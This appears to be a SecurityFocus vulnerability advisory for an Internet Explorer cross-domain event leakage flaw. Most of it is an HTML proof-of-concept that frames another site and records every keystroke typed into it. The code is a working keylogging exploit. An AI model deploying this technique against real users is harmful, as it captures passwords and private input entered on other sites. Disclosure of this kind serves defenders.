Microsoft Internet Explorer Cross-Domain Event Leakage Vulnerability

The following proof-of-concept was provided:

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>


 

Privacy Statement
Copyright 2010, SecurityFocus